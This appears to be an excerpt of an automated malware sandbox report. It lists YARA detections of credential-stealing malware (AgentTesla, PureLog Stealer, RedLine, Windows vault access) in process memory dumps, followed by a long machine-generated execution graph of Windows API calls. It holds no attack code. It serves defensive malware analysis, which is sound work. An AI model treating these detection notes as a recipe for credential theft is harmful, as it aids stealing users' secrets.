                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4151126152.000000000347C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.4151126152.000000000347C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000003.00000002.4149885312.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high
                              Has exited:false

                              Reset < >

                                Execution Graph

                                Execution Coverage:4%
                                Dynamic/Decrypted Code Coverage:0.4%
                                Signature Coverage:2.6%
                                Total number of Nodes:2000
                                Total number of Limit Nodes:53
                                execution_graph 98639 aa568a 98646 aa5c18 98639->98646 98645 aa56ba Mailbox 98665 ac0ff6 98646->98665 98648 aa5c2b 98649 ac0ff6 Mailbox 59 API calls 98648->98649 98650 aa569c 98649->98650 98651 aa5632 98650->98651 98703 aa5a2f 98651->98703 98655 aa5674 98655->98645 98657 aa81c1 MultiByteToWideChar 98655->98657 98656 aa5643 98656->98655 98710 aa5d20 98656->98710 98716 aa5bda 59 API calls 2 library calls 98656->98716 98658 aa822e 98657->98658 98659 aa81e7 98657->98659 98720 aa7eec 98658->98720 98660 ac0ff6 Mailbox 59 API calls 98659->98660 98662 aa81fc MultiByteToWideChar 98660->98662 98719 aa78ad 59 API calls 2 library calls 98662->98719 98664 aa8220 98664->98645 98667 ac0ffe 98665->98667 98668 ac1018 98667->98668 98670 ac101c std::exception::exception 98667->98670 98675 ac594c 98667->98675 98692 ac35e1 DecodePointer 98667->98692 98668->98648 98693 ac87db RaiseException 98670->98693 98672 ac1046 98694 ac8711 58 API calls _free 98672->98694 98674 ac1058 98674->98648 98676 ac59c7 98675->98676 98682 ac5958 98675->98682 98701 ac35e1 DecodePointer 98676->98701 98678 ac59cd 98702 ac8d68 58 API calls __getptd_noexit 98678->98702 98681 ac598b RtlAllocateHeap 98681->98682 98691 ac59bf 98681->98691 98682->98681 98684 ac59b3 98682->98684 98685 ac5963 98682->98685 98689 ac59b1 98682->98689 98698 ac35e1 DecodePointer 98682->98698 98699 ac8d68 58 API calls __getptd_noexit 98684->98699 98685->98682 98695 aca3ab 58 API calls __NMSG_WRITE 98685->98695 98696 aca408 58 API calls 5 library calls 98685->98696 98697 ac32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98685->98697 98700 ac8d68 58 API calls __getptd_noexit 98689->98700 98691->98667 98692->98667 98693->98672 98694->98674 98695->98685 98696->98685 98698->98682 98699->98689 98700->98691 98701->98678 98702->98691 98704 ade065 98703->98704 98705 aa5a40 98703->98705 98717 af6443 59 API calls Mailbox 98704->98717 98705->98656 98707 ade06f 98708 ac0ff6 Mailbox 59 API calls 98707->98708 98709 ade07b 98708->98709 98711 aa5d93 98710->98711 98715 aa5d2e 98710->98715 98718 aa5dae SetFilePointerEx 98711->98718 98712 aa5d56 98712->98656 98714 aa5d66 ReadFile 98714->98712 98714->98715 98715->98712 98715->98714 98716->98656 98717->98707 98718->98715 98719->98664 98721 aa7f06 98720->98721 98723 aa7ef9 98720->98723 98722 ac0ff6 Mailbox 59 API calls 98721->98722 98722->98723 98723->98664 98724 aae70b 98727 aad260 98724->98727 98726 aae719 98728 aad27d 98727->98728 98756 aad4dd 98727->98756 98729 ae2b0a 98728->98729 98730 ae2abb 98728->98730 98759 aad2a4 98728->98759 98801 b1a6fb 341 API calls __cinit 98729->98801 98733 ae2abe 98730->98733 98738 ae2ad9 98730->98738 98734 ae2aca 98733->98734 98733->98759 98799 b1ad0f 341 API calls 98734->98799 98738->98756 98800 b1b1b7 341 API calls 3 library calls 98738->98800 98739 ae2cdf 98739->98739 98740 aad6ab 98740->98726 98741 aad594 98790 aa8bb2 68 API calls 98741->98790 98745 aad5a3 98745->98726 98746 ae2c26 98809 b1aa66 89 API calls 98746->98809 98756->98740 98810 b0a0b5 89 API calls 4 library calls 98756->98810 98759->98740 98759->98741 98759->98746 98759->98756 98761 aaa000 98759->98761 98784 aa88a0 68 API calls __cinit 98759->98784 98785 aa86a2 68 API calls 98759->98785 98786 aa8620 98759->98786 98791 aa859a 68 API calls 98759->98791 98792 aad0dc 341 API calls 98759->98792 98793 aa9f3a 59 API calls Mailbox 98759->98793 98794 ac2f80 98759->98794 98797 aad060 89 API calls 98759->98797 98798 aacedd 341 API calls 98759->98798 98802 aa8bb2 68 API calls 98759->98802 98803 aa9e9c 60 API calls Mailbox 98759->98803 98804 af6d03 60 API calls 98759->98804 98805 aa81a7 98759->98805 98762 aaa01f 98761->98762 98779 aaa04d Mailbox 98761->98779 98763 ac0ff6 Mailbox 59 API calls 98762->98763 98763->98779 98764 aab5d5 98765 aa81a7 59 API calls 98764->98765 98778 aaa1b7 98765->98778 98766 af7405 59 API calls 98766->98779 98767 aa77c7 59 API calls 98767->98779 98768 ac0ff6 59 API calls Mailbox 98768->98779 98771 aa81a7 59 API calls 98771->98779 98772 ac2f80 67 API calls __cinit 98772->98779 98774 ae047f 98813 b0a0b5 89 API calls 4 library calls 98774->98813 98777 ae048e 98777->98759 98778->98759 98779->98764 98779->98766 98779->98767 98779->98768 98779->98771 98779->98772 98779->98774 98779->98778 98780 ae0e00 98779->98780 98782 aaa6ba 98779->98782 98783 aab5da 98779->98783 98811 aaca20 341 API calls 2 library calls 98779->98811 98812 aaba60 60 API calls Mailbox 98779->98812 98815 b0a0b5 89 API calls 4 library calls 98780->98815 98814 b0a0b5 89 API calls 4 library calls 98782->98814 98816 b0a0b5 89 API calls 4 library calls 98783->98816 98784->98759 98785->98759 98787 aa862b 98786->98787 98788 aa8652 98787->98788 98817 aa8b13 69 API calls Mailbox 98787->98817 98788->98759 98790->98745 98791->98759 98792->98759 98793->98759 98818 ac2e84 98794->98818 98796 ac2f8b 98796->98759 98797->98759 98798->98759 98799->98740 98800->98756 98801->98759 98802->98759 98803->98759 98804->98759 98806 aa81ba 98805->98806 98807 aa81b2 98805->98807 98806->98759 98896 aa80d7 59 API calls 2 library calls 98807->98896 98809->98756 98810->98739 98811->98779 98812->98779 98813->98777 98814->98778 98815->98783 98816->98778 98817->98788 98819 ac2e90 __wsopen_helper 98818->98819 98826 ac3457 98819->98826 98825 ac2eb7 __wsopen_helper 98825->98796 98843 ac9e4b 98826->98843 98828 ac2e99 98829 ac2ec8 DecodePointer DecodePointer 98828->98829 98830 ac2ea5 98829->98830 98831 ac2ef5 98829->98831 98840 ac2ec2 98830->98840 98831->98830 98889 ac89e4 59 API calls __controlfp_s 98831->98889 98833 ac2f58 EncodePointer EncodePointer 98833->98830 98834 ac2f07 98834->98833 98835 ac2f2c 98834->98835 98890 ac8aa4 61 API calls 2 library calls 98834->98890 98835->98830 98838 ac2f46 EncodePointer 98835->98838 98891 ac8aa4 61 API calls 2 library calls 98835->98891 98838->98833 98839 ac2f40 98839->98830 98839->98838 98892 ac3460 98840->98892 98844 ac9e5c 98843->98844 98845 ac9e6f EnterCriticalSection 98843->98845 98850 ac9ed3 98844->98850 98845->98828 98847 ac9e62 98847->98845 98874 ac32f5 58 API calls 3 library calls 98847->98874 98851 ac9edf __wsopen_helper 98850->98851 98852 ac9ee8 98851->98852 98853 ac9f00 98851->98853 98875 aca3ab 58 API calls __NMSG_WRITE 98852->98875 98865 ac9f21 __wsopen_helper 98853->98865 98878 ac8a5d 58 API calls 2 library calls 98853->98878 98855 ac9eed 98876 aca408 58 API calls 5 library calls 98855->98876 98857 ac9f15 98859 ac9f1c 98857->98859 98860 ac9f2b 98857->98860 98879 ac8d68 58 API calls __getptd_noexit 98859->98879 98863 ac9e4b __lock 58 API calls 98860->98863 98861 ac9ef4 98877 ac32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98861->98877 98866 ac9f32 98863->98866 98865->98847 98868 ac9f3f 98866->98868 98869 ac9f57 98866->98869 98880 aca06b InitializeCriticalSectionAndSpinCount 98868->98880 98881 ac2f95 98869->98881 98872 ac9f4b 98887 ac9f73 LeaveCriticalSection _doexit 98872->98887 98875->98855 98876->98861 98878->98857 98879->98865 98880->98872 98882 ac2f9e RtlFreeHeap 98881->98882 98886 ac2fc7 _free 98881->98886 98883 ac2fb3 98882->98883 98882->98886 98888 ac8d68 58 API calls __getptd_noexit 98883->98888 98885 ac2fb9 GetLastError 98885->98886 98886->98872 98887->98865 98888->98885 98889->98834 98890->98835 98891->98839 98895 ac9fb5 LeaveCriticalSection 98892->98895 98894 ac2ec7 98894->98825 98895->98894 98896->98806 98897 a423b0 98912 a40000 98897->98912 98899 a42473 98915 a422a0 98899->98915 98918 a434a0 GetPEB 98912->98918 98914 a4068b 98914->98899 98916 a422a9 Sleep 98915->98916 98917 a422b7 98916->98917 98919 a434ca 98918->98919 98919->98914 98920 aa107d 98925 aa71eb 98920->98925 98922 aa108c 98923 ac2f80 __cinit 67 API calls 98922->98923 98924 aa1096 98923->98924 98926 aa71fb __ftell_nolock 98925->98926 98956 aa77c7 98926->98956 98930 aa72ba 98968 ac074f 98930->98968 98937 aa77c7 59 API calls 98938 aa72eb 98937->98938 98939 aa7eec 59 API calls 98938->98939 98940 aa72f4 RegOpenKeyExW 98939->98940 98941 adecda RegQueryValueExW 98940->98941 98945 aa7316 Mailbox 98940->98945 98942 aded6c RegCloseKey 98941->98942 98943 adecf7 98941->98943 98942->98945 98953 aded7e _wcscat Mailbox __NMSG_WRITE 98942->98953 98944 ac0ff6 Mailbox 59 API calls 98943->98944 98946 aded10 98944->98946 98945->98922 98987 aa538e 98946->98987 98949 aa7b52 59 API calls 98949->98953 98950 aded38 98990 aa7d2c 98950->98990 98952 aded52 98952->98942 98953->98945 98953->98949 98955 aa3f84 59 API calls 98953->98955 98999 aa7f41 98953->98999 98955->98953 98957 ac0ff6 Mailbox 59 API calls 98956->98957 98958 aa77e8 98957->98958 98959 ac0ff6 Mailbox 59 API calls 98958->98959 98960 aa72b1 98959->98960 98961 aa4864 98960->98961 99003 ad1b90 98961->99003 98964 aa7f41 59 API calls 98965 aa4897 98964->98965 99005 aa48ae 98965->99005 98967 aa48a1 Mailbox 98967->98930 98969 ad1b90 __ftell_nolock 98968->98969 98970 ac075c GetFullPathNameW 98969->98970 98971 ac077e 98970->98971 98972 aa7d2c 59 API calls 98971->98972 98973 aa72c5 98972->98973 98974 aa7e0b 98973->98974 98975 aa7e1f 98974->98975 98976 adf173 98974->98976 99027 aa7db0 98975->99027 99032 aa8189 98976->99032 98979 aa72d3 98981 aa3f84 98979->98981 98980 adf17e __NMSG_WRITE _memmove 98982 aa3f92 98981->98982 98986 aa3fb4 _memmove 98981->98986 98985 ac0ff6 Mailbox 59 API calls 98982->98985 98983 ac0ff6 Mailbox 59 API calls 98984 aa3fc8 98983->98984 98984->98937 98985->98986 98986->98983 98988 ac0ff6 Mailbox 59 API calls 98987->98988 98989 aa53a0 RegQueryValueExW 98988->98989 98989->98950 98989->98952 98991 aa7d38 __NMSG_WRITE 98990->98991 98992 aa7da5 98990->98992 98994 aa7d4e 98991->98994 98995 aa7d73 98991->98995 98993 aa7e8c 59 API calls 98992->98993 98998 aa7d56 _memmove 98993->98998 99035 aa8087 59 API calls Mailbox 98994->99035 98997 aa8189 59 API calls 98995->98997 98997->98998 98998->98952 99000 aa7f50 __NMSG_WRITE _memmove 98999->99000 99001 ac0ff6 Mailbox 59 API calls 99000->99001 99002 aa7f8e 99001->99002 99002->98953 99004 aa4871 GetModuleFileNameW 99003->99004 99004->98964 99006 ad1b90 __ftell_nolock 99005->99006 99007 aa48bb GetFullPathNameW 99006->99007 99008 aa48da 99007->99008 99009 aa48f7 99007->99009 99010 aa7d2c 59 API calls 99008->99010 99011 aa7eec 59 API calls 99009->99011 99012 aa48e6 99010->99012 99011->99012 99015 aa7886 99012->99015 99016 aa7894 99015->99016 99019 aa7e8c 99016->99019 99018 aa48f2 99018->98967 99020 aa7e9a 99019->99020 99021 aa7ea3 _memmove 99019->99021 99020->99021 99023 aa7faf 99020->99023 99021->99018 99024 aa7fc2 99023->99024 99026 aa7fbf _memmove 99023->99026 99025 ac0ff6 Mailbox 59 API calls 99024->99025 99025->99026 99026->99021 99028 aa7dbf __NMSG_WRITE 99027->99028 99029 aa8189 59 API calls 99028->99029 99030 aa7dd0 _memmove 99028->99030 99031 adf130 _memmove 99029->99031 99030->98979 99033 ac0ff6 Mailbox 59 API calls 99032->99033 99034 aa8193 99033->99034 99034->98980 99035->98998 99036 ae0226 99045 aaade2 Mailbox 99036->99045 99038 ae0c86 99200 af66f4 99038->99200 99040 ae0c8f 99042 ae00e0 VariantClear 99042->99045 99043 aab6c1 99199 b0a0b5 89 API calls 4 library calls 99043->99199 99045->99038 99045->99040 99045->99042 99045->99043 99051 b0d2e6 99045->99051 99098 b0d2e5 99045->99098 99145 ab2123 99045->99145 99185 b1474d 99045->99185 99194 b1e237 99045->99194 99197 aa9df0 59 API calls Mailbox 99045->99197 99198 af7405 59 API calls 99045->99198 99052 b0d305 99051->99052 99053 b0d310 99051->99053 99234 aa9c9c 99052->99234 99054 b0d3ea Mailbox 99053->99054 99057 aa77c7 59 API calls 99053->99057 99056 ac0ff6 Mailbox 59 API calls 99054->99056 99079 b0d3f3 Mailbox 99054->99079 99058 b0d433 99056->99058 99059 b0d334 99057->99059 99060 b0d43f 99058->99060 99302 aa5906 60 API calls Mailbox 99058->99302 99061 aa77c7 59 API calls 99059->99061 99203 aa9997 99060->99203 99063 b0d33d 99061->99063 99065 aa9997 84 API calls 99063->99065 99067 b0d349 99065->99067 99238 aa46f9 99067->99238 99071 b0d35e 99289 aa7c8e 99071->99289 99072 b0d46a GetLastError 99075 b0d483 99072->99075 99073 b0d49e 99076 b0d500 99073->99076 99077 b0d4c9 99073->99077 99075->99079 99303 aa5a1a CloseHandle 99075->99303 99080 ac0ff6 Mailbox 59 API calls 99076->99080 99081 ac0ff6 Mailbox 59 API calls 99077->99081 99079->99045 99084 b0d505 99080->99084 99086 b0d4ce 99081->99086 99082 b0d3e3 99085 aa9c9c 59 API calls 99082->99085 99084->99079 99091 aa77c7 59 API calls 99084->99091 99085->99054 99088 b0d4df 99086->99088 99092 aa77c7 59 API calls 99086->99092 99304 b0f835 59 API calls 2 library calls 99088->99304 99090 b0d3a5 99093 aa7f41 59 API calls 99090->99093 99091->99079 99092->99088 99095 b0d3b2 99093->99095 99301 b03c66 63 API calls Mailbox 99095->99301 99097 b0d3bb Mailbox 99097->99082 99099 b0d305 99098->99099 99100 b0d310 99098->99100 99101 aa9c9c 59 API calls 99099->99101 99103 aa77c7 59 API calls 99100->99103 99143 b0d3ea Mailbox 99100->99143 99101->99100 99102 ac0ff6 Mailbox 59 API calls 99104 b0d433 99102->99104 99105 b0d334 99103->99105 99106 b0d43f 99104->99106 99384 aa5906 60 API calls Mailbox 99104->99384 99107 aa77c7 59 API calls 99105->99107 99110 aa9997 84 API calls 99106->99110 99109 b0d33d 99107->99109 99111 aa9997 84 API calls 99109->99111 99112 b0d457 99110->99112 99113 b0d349 99111->99113 99114 aa5956 67 API calls 99112->99114 99115 aa46f9 59 API calls 99113->99115 99116 b0d466 99114->99116 99117 b0d35e 99115->99117 99118 b0d46a GetLastError 99116->99118 99125 b0d49e 99116->99125 99119 aa7c8e 59 API calls 99117->99119 99123 b0d483 99118->99123 99122 b0d391 99119->99122 99120 b0d500 99124 ac0ff6 Mailbox 59 API calls 99120->99124 99121 b0d4c9 99126 ac0ff6 Mailbox 59 API calls 99121->99126 99127 b0d3e3 99122->99127 99132 b03e73 3 API calls 99122->99132 99141 b0d3f3 Mailbox 99123->99141 99385 aa5a1a CloseHandle 99123->99385 99129 b0d505 99124->99129 99125->99120 99125->99121 99131 b0d4ce 99126->99131 99130 aa9c9c 59 API calls 99127->99130 99136 aa77c7 59 API calls 99129->99136 99129->99141 99130->99143 99133 b0d4df 99131->99133 99137 aa77c7 59 API calls 99131->99137 99134 b0d3a1 99132->99134 99386 b0f835 59 API calls 2 library calls 99133->99386 99134->99127 99135 b0d3a5 99134->99135 99138 aa7f41 59 API calls 99135->99138 99136->99141 99137->99133 99140 b0d3b2 99138->99140 99383 b03c66 63 API calls Mailbox 99140->99383 99141->99045 99143->99102 99143->99141 99144 b0d3bb Mailbox 99144->99127 99387 aa9bf8 99145->99387 99149 ac0ff6 Mailbox 59 API calls 99150 ab2154 99149->99150 99153 ab2164 99150->99153 99415 aa5906 60 API calls Mailbox 99150->99415 99151 ae69af 99152 ab2189 99151->99152 99419 b0f7df 59 API calls 99151->99419 99157 aa9c9c 59 API calls 99152->99157 99161 ab2196 99152->99161 99155 aa9997 84 API calls 99153->99155 99156 ab2172 99155->99156 99158 aa5956 67 API calls 99156->99158 99159 ae69f7 99157->99159 99162 ab2181 99158->99162 99160 ae69ff 99159->99160 99159->99161 99163 aa9c9c 59 API calls 99160->99163 99164 aa5e3f 2 API calls 99161->99164 99162->99151 99162->99152 99418 aa5a1a CloseHandle 99162->99418 99166 ab219d 99163->99166 99164->99166 99167 ab21b7 99166->99167 99168 ae6a11 99166->99168 99170 aa77c7 59 API calls 99167->99170 99169 ac0ff6 Mailbox 59 API calls 99168->99169 99172 ae6a17 99169->99172 99171 ab21bf 99170->99171 99400 aa56d2 99171->99400 99174 ae6a2b 99172->99174 99420 aa59b0 ReadFile SetFilePointerEx 99172->99420 99179 ae6a2f _memmove 99174->99179 99421 b0794e 59 API calls 2 library calls 99174->99421 99175 ab21ce 99175->99179 99416 aa9b9c 59 API calls Mailbox 99175->99416 99180 ab21e2 Mailbox 99181 ab221c 99180->99181 99182 aa5dcf CloseHandle 99180->99182 99181->99045 99183 ab2210 99182->99183 99183->99181 99417 aa5a1a CloseHandle 99183->99417 99186 aa9997 84 API calls 99185->99186 99187 b14787 99186->99187 99425 aa63a0 99187->99425 99189 b14797 99190 aaa000 341 API calls 99189->99190 99192 b147bc 99189->99192 99190->99192 99191 aa9bf8 59 API calls 99193 b147c0 99191->99193 99192->99191 99192->99193 99193->99045 99469 b1cdf1 99194->99469 99196 b1e247 99196->99045 99197->99045 99198->99045 99199->99038 99580 af6636 99200->99580 99202 af6702 99202->99040 99204 aa99b1 99203->99204 99213 aa99ab 99203->99213 99205 adf9fc __i64tow 99204->99205 99206 aa99f9 99204->99206 99207 adf903 99204->99207 99210 aa99b7 __itow 99204->99210 99305 ac38d8 83 API calls 3 library calls 99206->99305 99209 adf97b Mailbox _wcscpy 99207->99209 99216 ac0ff6 Mailbox 59 API calls 99207->99216 99306 ac38d8 83 API calls 3 library calls 99209->99306 99212 ac0ff6 Mailbox 59 API calls 99210->99212 99214 aa99d1 99212->99214 99221 aa5956 99213->99221 99214->99213 99215 aa7f41 59 API calls 99214->99215 99215->99213 99217 adf948 99216->99217 99218 ac0ff6 Mailbox 59 API calls 99217->99218 99219 adf96e 99218->99219 99219->99209 99220 aa7f41 59 API calls 99219->99220 99220->99209 99307 aa5dcf 99221->99307 99225 aa59a4 99225->99072 99225->99073 99226 aa5981 99226->99225 99319 aa5770 99226->99319 99228 aa5993 99336 aa53db SetFilePointerEx SetFilePointerEx 99228->99336 99230 aa599a 99230->99225 99231 ade030 99230->99231 99337 b03696 SetFilePointerEx SetFilePointerEx WriteFile 99231->99337 99233 ade060 99233->99225 99235 aa9cb2 99234->99235 99236 aa9cad 99234->99236 99235->99053 99236->99235 99353 ac37ca 59 API calls 99236->99353 99239 aa77c7 59 API calls 99238->99239 99240 aa470f 99239->99240 99241 aa77c7 59 API calls 99240->99241 99242 aa4717 99241->99242 99243 aa77c7 59 API calls 99242->99243 99244 aa471f 99243->99244 99245 aa77c7 59 API calls 99244->99245 99246 aa4727 99245->99246 99247 aa475b 99246->99247 99248 add8fb 99246->99248 99249 aa79ab 59 API calls 99247->99249 99250 aa81a7 59 API calls 99248->99250 99251 aa4769 99249->99251 99252 add904 99250->99252 99253 aa7e8c 59 API calls 99251->99253 99254 aa7eec 59 API calls 99252->99254 99255 aa4773 99253->99255 99257 aa479e 99254->99257 99256 aa79ab 59 API calls 99255->99256 99255->99257 99259 aa4794 99256->99259 99258 aa47de 99257->99258 99260 aa47bd 99257->99260 99271 add924 99257->99271 99354 aa79ab 99258->99354 99262 aa7e8c 59 API calls 99259->99262 99367 aa7b52 99260->99367 99262->99257 99263 add9f4 99267 aa7d2c 59 API calls 99263->99267 99265 aa47ef 99266 aa4801 99265->99266 99269 aa81a7 59 API calls 99265->99269 99270 aa4811 99266->99270 99272 aa81a7 59 API calls 99266->99272 99279 add9b1 99267->99279 99269->99266 99274 aa4818 99270->99274 99276 aa81a7 59 API calls 99270->99276 99271->99263 99273 add9dd 99271->99273 99286 add95b 99271->99286 99272->99270 99273->99263 99280 add9c8 99273->99280 99277 aa481f Mailbox 99274->99277 99278 aa81a7 59 API calls 99274->99278 99275 aa79ab 59 API calls 99275->99258 99276->99274 99277->99071 99278->99277 99279->99258 99284 aa7b52 59 API calls 99279->99284 99370 aa7a84 59 API calls 2 library calls 99279->99370 99283 aa7d2c 59 API calls 99280->99283 99281 add9b9 99282 aa7d2c 59 API calls 99281->99282 99282->99279 99283->99279 99284->99279 99286->99281 99287 add9a4 99286->99287 99288 aa7d2c 59 API calls 99287->99288 99288->99279 99290 adf094 99289->99290 99291 aa7ca0 99289->99291 99378 af8123 59 API calls _memmove 99290->99378 99372 aa7bb1 99291->99372 99294 aa7cac 99294->99082 99298 b03e73 99294->99298 99295 adf09e 99296 aa81a7 59 API calls 99295->99296 99297 adf0a6 Mailbox 99296->99297 99379 b04696 GetFileAttributesW 99298->99379 99301->99097 99302->99060 99303->99079 99304->99079 99305->99210 99306->99205 99308 aa5de8 99307->99308 99309 aa5962 99307->99309 99308->99309 99310 aa5ded CloseHandle 99308->99310 99311 aa5df9 99309->99311 99310->99309 99312 aa5e12 CreateFileW 99311->99312 99313 ade181 99311->99313 99314 aa5e34 99312->99314 99313->99314 99315 ade187 CreateFileW 99313->99315 99314->99226 99315->99314 99316 ade1ad 99315->99316 99338 aa5c4e 99316->99338 99320 aa578b 99319->99320 99321 addfce 99319->99321 99322 aa5c4e 2 API calls 99320->99322 99335 aa581a 99320->99335 99321->99335 99348 aa5e3f 99321->99348 99323 aa57ad 99322->99323 99325 aa538e 59 API calls 99323->99325 99326 aa57b7 99325->99326 99326->99321 99327 aa57c4 99326->99327 99328 ac0ff6 Mailbox 59 API calls 99327->99328 99329 aa57cf 99328->99329 99330 aa538e 59 API calls 99329->99330 99331 aa57da 99330->99331 99332 aa5d20 2 API calls 99331->99332 99333 aa5807 99332->99333 99334 aa5c4e 2 API calls 99333->99334 99334->99335 99335->99228 99336->99230 99337->99233 99344 aa5c68 99338->99344 99339 aa5cef SetFilePointerEx 99346 aa5dae SetFilePointerEx 99339->99346 99340 ade151 99347 aa5dae SetFilePointerEx 99340->99347 99343 ade16b 99344->99339 99344->99340 99345 aa5cc3 99344->99345 99345->99314 99346->99345 99347->99343 99349 aa5c4e 2 API calls 99348->99349 99350 aa5e60 99349->99350 99351 aa5c4e 2 API calls 99350->99351 99352 aa5e74 99351->99352 99352->99335 99353->99235 99355 aa79ba 99354->99355 99356 aa7a17 99354->99356 99355->99356 99358 aa79c5 99355->99358 99357 aa7e8c 59 API calls 99356->99357 99363 aa79e8 _memmove 99357->99363 99359 aa79e0 99358->99359 99360 adef32 99358->99360 99371 aa8087 59 API calls Mailbox 99359->99371 99362 aa8189 59 API calls 99360->99362 99364 adef3c 99362->99364 99363->99265 99365 ac0ff6 Mailbox 59 API calls 99364->99365 99366 adef5c 99365->99366 99368 aa7faf 59 API calls 99367->99368 99369 aa47c7 99368->99369 99369->99258 99369->99275 99370->99279 99371->99363 99373 aa7bbf 99372->99373 99374 aa7be5 _memmove 99372->99374 99373->99374 99375 ac0ff6 Mailbox 59 API calls 99373->99375 99374->99294 99374->99374 99376 aa7c34 99375->99376 99377 ac0ff6 Mailbox 59 API calls 99376->99377 99377->99374 99378->99295 99380 b03e7a 99379->99380 99381 b046b1 FindFirstFileW 99379->99381 99380->99082 99380->99090 99381->99380 99382 b046c6 FindClose 99381->99382 99382->99380 99383->99144 99384->99106 99385->99141 99386->99141 99388 aa9c08 99387->99388 99389 adfbff 99387->99389 99394 ac0ff6 Mailbox 59 API calls 99388->99394 99390 adfc10 99389->99390 99391 aa7d2c 59 API calls 99389->99391 99392 aa7eec 59 API calls 99390->99392 99391->99390 99393 adfc1a 99392->99393 99397 aa9c34 99393->99397 99398 aa77c7 59 API calls 99393->99398 99395 aa9c1b 99394->99395 99395->99393 99396 aa9c26 99395->99396 99396->99397 99399 aa7f41 59 API calls 99396->99399 99397->99149 99397->99151 99398->99397 99399->99397 99401 aa56dd 99400->99401 99402 aa5702 99400->99402 99401->99402 99406 aa56ec 99401->99406 99403 aa7eec 59 API calls 99402->99403 99407 b0349a 99403->99407 99404 b034c9 99404->99175 99408 aa5c18 59 API calls 99406->99408 99407->99404 99422 b03436 ReadFile SetFilePointerEx 99407->99422 99423 aa7a84 59 API calls 2 library calls 99407->99423 99409 b035ba 99408->99409 99411 aa5632 61 API calls 99409->99411 99412 b035c8 99411->99412 99414 b035d8 Mailbox 99412->99414 99424 aa793a 61 API calls Mailbox 99412->99424 99414->99175 99415->99153 99416->99180 99417->99181 99418->99151 99419->99151 99420->99174 99421->99179 99422->99407 99423->99407 99424->99414 99450 aa7b76 99425->99450 99427 aa65ca 99457 aa766f 99427->99457 99429 aa65e4 Mailbox 99429->99189 99432 ade41f 99467 affdba 91 API calls 4 library calls 99432->99467 99433 aa766f 59 API calls 99442 aa63c5 99433->99442 99437 ade42d 99439 aa766f 59 API calls 99437->99439 99438 aa7eec 59 API calls 99438->99442 99440 ade443 99439->99440 99440->99429 99441 aa68f9 _memmove 99468 affdba 91 API calls 4 library calls 99441->99468 99442->99427 99442->99432 99442->99433 99442->99438 99442->99441 99443 ade3bb 99442->99443 99446 aa7faf 59 API calls 99442->99446 99455 aa60cc 60 API calls 99442->99455 99456 aa5ea1 59 API calls Mailbox 99442->99456 99465 aa5fd2 60 API calls 99442->99465 99466 aa7a84 59 API calls 2 library calls 99442->99466 99444 aa8189 59 API calls 99443->99444 99445 ade3c6 99444->99445 99449 ac0ff6 Mailbox 59 API calls 99445->99449 99448 aa659b CharUpperBuffW 99446->99448 99448->99442 99449->99441 99451 ac0ff6 Mailbox 59 API calls 99450->99451 99452 aa7b9b 99451->99452 99453 aa8189 59 API calls 99452->99453 99454 aa7baa 99453->99454 99454->99442 99455->99442 99456->99442 99458 aa770f 99457->99458 99461 aa7682 _memmove 99457->99461 99460 ac0ff6 Mailbox 59 API calls 99458->99460 99459 ac0ff6 Mailbox 59 API calls 99463 aa7689 99459->99463 99460->99461 99461->99459 99462 aa76b2 99462->99429 99463->99462 99464 ac0ff6 Mailbox 59 API calls 99463->99464 99464->99462 99465->99442 99466->99442 99467->99437 99468->99429 99470 aa9997 84 API calls 99469->99470 99471 b1ce2e 99470->99471 